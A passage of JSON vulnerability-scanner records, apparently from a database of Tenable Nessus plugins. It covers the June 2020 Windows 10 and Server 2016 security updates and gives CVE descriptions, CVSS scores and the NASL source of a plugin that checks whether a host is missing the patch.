vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561616: Windows 10 Version 1607 and Windows Server 2016 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561616.NASL", "href": "https://www.tenable.com/plugins/nessus/137258", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137258);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561616\");\n script_xref(name:\"MSFT\", value:\"MS20-4561616\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n\n script_name(english:\"KB4561616: Windows 10 Version 1607 and Windows Server 2016 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561616.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1235, CVE-2020-1282,\n CVE-2020-1304, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\");\n # https://support.microsoft.com/en-us/help/4561616/windows-10-update-kb4561616\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0526efa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561616.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561616'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561616])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T09:55:06", "description": "The remote Windows host is missing security update 4561602.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302,\n CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n 